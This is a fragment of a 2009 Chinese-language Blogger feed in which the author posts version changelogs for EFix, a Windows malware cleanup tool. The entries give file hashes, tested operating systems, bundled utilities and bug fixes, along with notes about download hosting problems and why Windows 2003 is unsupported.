class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4739168471803821120?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4739168471803821120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4739168471803821120'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/10/yahoo-mail.html' title='近期Yahoo Mail信箱的病毒一些防治方式'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_XPrN8EVFxI4/St_tvf-zZ_I/AAAAAAAAAWE/7L26gqDb-zc/s72-c/lnk1.JPG' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-8671818763774682235</id><published>2009-10-21T12:48:00.002+08:00</published><updated>2009-10-21T12:54:19.309+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.3 20091021.21</title><content type='html'>版本：5.3 20091021.21&lt;br /&gt;&lt;br /&gt;檔案資訊 (未壓縮的exe檔)：&lt;br /&gt;File size: 1112368 bytes&lt;br /&gt;MD5...: bb3707a7de405c89e826b3d8633e8ba2&lt;br /&gt;SHA1..: 099dbfdaa2d39db1f8993b36bbca7c84f7d2872a&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 RC1&lt;br /&gt;Windows XP SP2&lt;br /&gt;&lt;br /&gt;修改事項&lt;br /&gt;修正取得磁碟代號失敗後走備援方案時跳出的問題&lt;br /&gt;新增一點刪除檔案&lt;br /&gt;VBSCRIPT腳本作一些整合.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;最近家裡事情很多，可能一小段時間除非有大流行或者是有比較需要馬上修正的BUG&lt;br /&gt;不然可能暫時會先擺著，可能要到11月中才會在作一些變動..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-8671818763774682235?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8671818763774682235'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8671818763774682235'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/10/efix-53-2009102121.html' title='EFix 5.3 20091021.21'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-7618603765070557567</id><published>2009-10-07T14:57:00.003+08:00</published><updated>2009-10-07T15:05:33.554+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>EF Win 2003不支援的原因</title><content type='html'>有些人問我怎麼不讓EFix支援Windows 2003?&lt;br /&gt;&lt;br /&gt;簡單說因為我手邊沒有作業系統可以測試&lt;br /&gt;從以前到現在都沒有過&lt;br /&gt;不像VISTA或2000我偶爾還有機會碰到可以查一下&lt;br /&gt;&lt;br /&gt;而Win 2003和其他作業系統的一些差別我沒辦法得知&lt;br /&gt;使用上可能看不出來，但一些驅動和服務的值和一些登錄設定的值是完全不同的,2000和XP和VISTA就是這樣&lt;br /&gt;&lt;br /&gt;也因此我並沒有辦法得知2003的一些設定值和其他作業系統哪邊不一樣的情形下&lt;br /&gt;我不敢隨便就讓他能夠跑.&lt;br /&gt;&lt;br /&gt;以前舊版能跑是因為腳本不嚴謹沒有特別設規則讓他跳出 , 沒跑出問題很偷笑了...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-7618603765070557567?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7618603765070557567'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7618603765070557567'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/10/ef-win-2003.html' title='EF Win 2003不支援的原因'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-8384106070529234810</id><published>2009-10-07T14:39:00.002+08:00</published><updated>2009-10-07T14:44:22.963+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.3 20091007.17</title><content type='html'>版本：&lt;br /&gt;5.3 20091007.17&lt;br /&gt;&lt;br /&gt;檔案資訊 ( 解開ZIP後的大小 ):&lt;br /&gt;File size: 1112999 bytes&lt;br /&gt;MD5...: c8cff35ed0f0893d5ed5c9cc1a7f2467&lt;br /&gt;SHA1..: a0486c71d56661690a1f0e3b7cba08764dabed90&lt;br /&gt;&lt;br /&gt;測試過的作業系統:&lt;br /&gt;Windows 7 RC1&lt;br /&gt;Windows XP&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;移除第三方工具Donwload , 新增第三方工具&lt;a href="http://curl.haxx.se/"&gt;cURL&lt;/a&gt;&lt;br /&gt;修正一些打錯字的地方&lt;br /&gt;增加分析磁碟根目錄下的隱藏資料夾和同名檔案&lt;br /&gt;腳本自動下載工具的連結多增加三個。降低空間負擔並提高下載成功率&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-8384106070529234810?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8384106070529234810'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8384106070529234810'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/10/efix-53-2009100717.html' title='EFix 5.3 20091007.17'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4192178247294462295</id><published>2009-09-29T16:46:00.004+08:00</published><updated>2009-09-29T17:03:53.271+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.3 20090929.12</title><content type='html'>版本：5.3 20090929.12&lt;br /&gt;&lt;br /&gt;檔案資訊 (ZIP壓縮解開後)：&lt;br /&gt;File size: 978882 bytes&lt;br /&gt;MD5...: f4301f32ac80d7d3612f2489637da711&lt;br /&gt;SHA1..: b2ea7b521fe37fffeaa9712945111a7827dd4833&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP&lt;br /&gt;Windows 7 RC1&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正SCRIPT GUI 英文介面選項都不能使用的問題&lt;br /&gt;修正一些腳本錯誤的代碼&lt;br /&gt;修正一些腳本打錯字的地方&lt;br /&gt;修改腳本執行方式，可盡量避免因腳本中斷造成各種執行上的問題，但缺點是變成雙程序在跑&lt;br /&gt;修改偵測新版本EFix的方式，可避免因HINET空間快取問題導致的一堆狀況.&lt;br /&gt;新增自訂腳本參數CP FILE::&lt;br /&gt;此參數為複製檔案用參數，用途通常為還原被病毒替換的系統檔案&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;註1：&lt;/span&gt;&lt;br /&gt;因應HINET空間快取的問題，所以以後檔案名稱又要作修改.&lt;br /&gt;修改的原則是EF%日期版本編號%.exe&lt;br /&gt;&lt;br /&gt;比如說像這一次發佈的 20090929.12版&lt;br /&gt;下載的檔案就是EF2009092912.exe&lt;br /&gt;以此類推&lt;br /&gt;&lt;br /&gt;利用檔案名稱不同的方式來避開HINET空間快取的機制&lt;br /&gt;同時也可避免以後有可能會碰到的劫持 (EX:IFEO 安全性原則封鎖)&lt;br /&gt;也可以避免直接連結XD&lt;br /&gt;不過這樣我比較累就是0rz&lt;br /&gt;還有部分東西還沒整理，不過老闆在罵人了堆了一堆case都沒弄冏&gt;&lt;br /&gt;所以就等下一次改版在說吧.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;註2:&lt;/span&gt;&lt;br /&gt;HINET空間下載連結暫時還是一樣不發，現在正在找比較適合的方式.&lt;br /&gt;如果您無法使用便當狗空間的話&lt;br /&gt;就請您下載&lt;br /&gt;http://sylovanas.myweb.hinet.net/EF/EF版本編號.exe&lt;br /&gt;像這一版就是&lt;br /&gt;EF2009092912.exe&lt;br /&gt;&lt;br /&gt;我不直接貼連結是因為太多人都點HINET空間，結果常造成HINET空間過度不穩定.&lt;br /&gt;這樣會讓之後可能會下載的腳本工具出現非常多不穩定的因素.&lt;br /&gt;因此有不便之處還請多多見諒.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4192178247294462295?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4192178247294462295'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4192178247294462295'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/efix-53-2009092912.html' title='EFix 5.3 20090929.12'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4787688796480298453</id><published>2009-09-26T13:11:00.001+08:00</published><updated>2009-09-26T13:13:09.832+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>下載連結修改</title><content type='html'>&lt;p&gt;咪的勒真棒的便當狗&lt;/p&gt;&lt;p&gt;自動給我將副檔名作修改...&lt;/p&gt;&lt;p&gt;這邊將便當狗的連結作一個修改&lt;/p&gt;&lt;p&gt;並將原本的執行檔壓縮成zip檔&lt;/p&gt;&lt;p&gt;下載後請解壓縮執行.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Hinet空間的問題我在想辦法搞定..&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4787688796480298453?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4787688796480298453'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4787688796480298453'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/blog-post_26.html' title='下載連結修改'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6310652097893466050</id><published>2009-09-25T15:03:00.001+08:00</published><updated>2009-09-25T15:06:54.440+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.3 20090925.09</title><content type='html'>版本： 5.3 20090925.09&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 978576 bytes&lt;br /&gt;MD5...: 39eefb6856963b435fbcaa4bc8f23241&lt;br /&gt;SHA1..: 1b0c79d9911e591e5bf41ada2c404b6a5d048252&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP2&lt;br /&gt;Windows 7 RC1&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;更新第三方工具&lt;a href="http://www.nirsoft.net/utils/nircmd.html"&gt;Nircmd&lt;/a&gt;&lt;br /&gt;修改免責事項說明&lt;br /&gt;增加一點刪除檔案&lt;br /&gt;增加免責聲明按否和SCRIPT GUI視窗按取消時會將作業資料夾刪除以節省空間.&lt;br /&gt;修改部分檔案位置讓分散的檔案盡可能集中放在同一資料夾內方便處理.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6310652097893466050?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6310652097893466050'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6310652097893466050'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/efix-53-2009092509.html' title='EFix 5.3 20090925.09'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5106128349550842206</id><published>2009-09-23T10:00:00.000+08:00</published><updated>2009-09-23T10:01:49.552+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>Hinet空間暫停</title><content type='html'>似乎用的人太多下載出問題了..&lt;br /&gt;我這邊自己點都一直點下載到前兩個版本的0rz.&lt;br /&gt;&lt;br /&gt;所以暫停一天到兩天&lt;br /&gt;等他處理好之後在放上來&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5106128349550842206?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5106128349550842206'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5106128349550842206'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/hinet.html' title='Hinet空間暫停'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2221787564882423154</id><published>2009-09-22T22:06:00.003+08:00</published><updated>2009-09-23T08:57:40.350+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.3 20090921.07</title><content type='html'>&lt;p&gt;版本：5.3 20090921.07&lt;/p&gt;&lt;p&gt;檔案資訊：&lt;br /&gt;File size: 954433 bytes&lt;br /&gt;MD5...: 976ecd785cbcee98da2a940f8e176748&lt;br /&gt;SHA1..: 1d184f9771181a1dbd87eb63afc9639f816e9d64&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC1&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;修改事項：&lt;br /&gt;去掉執行後開我的電腦會強制顯示右方資料夾的功能&lt;br /&gt;本來是要應對最近有看到的一個惡意程式&lt;br /&gt;不過因為每個人設定值都有一點不太一樣，所以就放棄強制修復.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2221787564882423154?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2221787564882423154'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2221787564882423154'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/efix-ver-53-2009092207.html' title='EFix Ver 5.3 20090921.07'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1946706288110837634</id><published>2009-09-22T13:45:00.001+08:00</published><updated>2009-09-22T13:47:27.294+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.3 20090921.06</title><content type='html'>版本：5.3 20090921.06&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 944619 bytes&lt;br /&gt;MD5...: 44e8d9e10d60477816e2d1c8dbc67911&lt;br /&gt;SHA1..: 27fa883579f7460534efd7861a9c42f793538742&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC1&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;剛剛放錯檔0rz&lt;br /&gt;但為了區別版本所以版本號更新了一點&lt;br /&gt;.05底下那個版有會誤將taskman值修改成不正確值的問題.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1946706288110837634?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1946706288110837634'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1946706288110837634'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/efix-ver-53-2009092106.html' title='EFix Ver 5.3 20090921.06'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3919222162067822339</id><published>2009-09-22T13:04:00.001+08:00</published><updated>2009-09-22T13:07:11.354+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.3 20090921.05</title><content type='html'>版本： 5.3 20090921.05&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 944621 bytes&lt;br /&gt;MD5...: 6b36f7741dbf02c950ce9637ca98693d&lt;br /&gt;SHA1..: 8824cf52d24e4ea08c677ba5d12b3acdb067de4f&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC1 7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加第三方工具&lt;a href="http://www.sysinternals.com"&gt;Streams&lt;/a&gt;&lt;br /&gt;增加刪除清單&lt;br /&gt;自訂腳本新增clean ADS::&lt;br /&gt;用來清除NTFS文件流用的&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3919222162067822339?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3919222162067822339'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3919222162067822339'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/efix-ver-53-2009092105.html' title='EFix Ver 5.3 20090921.05'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6436223577302699434</id><published>2009-09-17T10:23:00.002+08:00</published><updated>2009-09-17T10:50:00.441+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.3 20090917.02</title><content type='html'>版本：5.3 20090917.02&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 924587 bytes&lt;br /&gt;MD5...: ac86fb9f192254aa1d637d72b04ee4ba&lt;br /&gt;SHA1..: e091eb560ba832061f22abd0e8a31dce18f09bc4&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;windows xp sp2&lt;br /&gt;windows 7 RC7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;script gui介面作大幅修改&lt;br /&gt;增加gui功能&lt;br /&gt;增加第三方工具mshta.exe&lt;br /&gt;增加部分刪除檔案&lt;br /&gt;一開始執行時會先將先前改亂數名的檔案刪除.&lt;br /&gt;&lt;br /&gt;有部分檔案時間不夠加上去，下次改版在加.&lt;br /&gt;&lt;br /&gt;註：&lt;br /&gt;有另外使用自定義腳本功能的人請注意一下位置有變了&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6436223577302699434?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6436223577302699434'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6436223577302699434'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/efix-ver-53-2009091702.html' title='EFix Ver 5.3 20090917.02'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1432227709319680557</id><published>2009-09-08T13:58:00.001+08:00</published><updated>2009-09-08T14:00:16.192+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090908.67</title><content type='html'>版本：5.2 20090908.67&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 909780 bytes&lt;br /&gt;MD5...: 003e21f33d47bb645d3c18978ef05073&lt;br /&gt;SHA1..: 2dd6cd7bd5a163d97940a0ac0912a6e8955aeb40&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC 7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;新增刪除檔案&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1432227709319680557?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1432227709319680557'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1432227709319680557'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/efix-ver-52-2009090867.html' title='EFix Ver 5.2 20090908.67'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4691311570796903395</id><published>2009-09-05T11:34:00.003+08:00</published><updated>2009-09-05T11:39:34.984+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>增加一個下載連結</title><content type='html'>這個連結是便當狗的....&lt;br /&gt;&lt;br /&gt;為何用便當狗？&lt;br /&gt;因為剛剛在用便當狗下檔案XD&lt;br /&gt;&lt;br /&gt;用看看看能不能減緩一點Hinet空間的負擔&lt;br /&gt;&lt;br /&gt;另外對幫助提供空間的人&lt;br /&gt;基本上是很感謝你們好心提供出空間給我&lt;br /&gt;&lt;br /&gt;不過因為小弟不好意思使用=.=a&lt;br /&gt;也怕說如果有些人在執行EF前中後出現甚麼事情要找我算帳還是幹嘛的&lt;br /&gt;會牽扯到提供空間的人&lt;br /&gt;所以我想這邊空間盡量以免費和我自己用的為主&lt;br /&gt;這樣可以避免爭議啦...&lt;br /&gt;&lt;br /&gt;不過在此還是非常感謝提供空間的人的心意m(_o_)m&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4691311570796903395?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4691311570796903395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4691311570796903395'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/09/blog-post.html' title='增加一個下載連結'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-8540265266983842672</id><published>2009-08-28T16:46:00.001+08:00</published><updated>2009-08-28T16:48:56.736+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090828.61</title><content type='html'>版本： 5.2 20090828.61&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 909284 bytes&lt;br /&gt;MD5...: 26b5fae0c7cacd482313a5d4ce6aefdb&lt;br /&gt;SHA1..: 77fdc3f8d8eb8d721873bd902b621488df9b497d&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC 7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修改腳本del driver::以及其他一些bug&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-8540265266983842672?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8540265266983842672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8540265266983842672'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/08/efix-ver-52-2009082861.html' title='EFix Ver 5.2 20090828.61'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-7090335055532537101</id><published>2009-08-23T20:26:00.000+08:00</published><updated>2009-08-23T20:28:01.502+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.2 20090823.59</title><content type='html'>版本：5.2 20090823.59&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 918594 bytes&lt;br /&gt;MD5...: 5429024152dee3d418ccaa16344ad65c&lt;br /&gt;SHA1..: cad3f3d570a81efd72b901cf3f71489aa6932b83&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC 7100&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加刪除檔案&lt;br /&gt;修bug&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-7090335055532537101?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7090335055532537101'/><link rel='self' 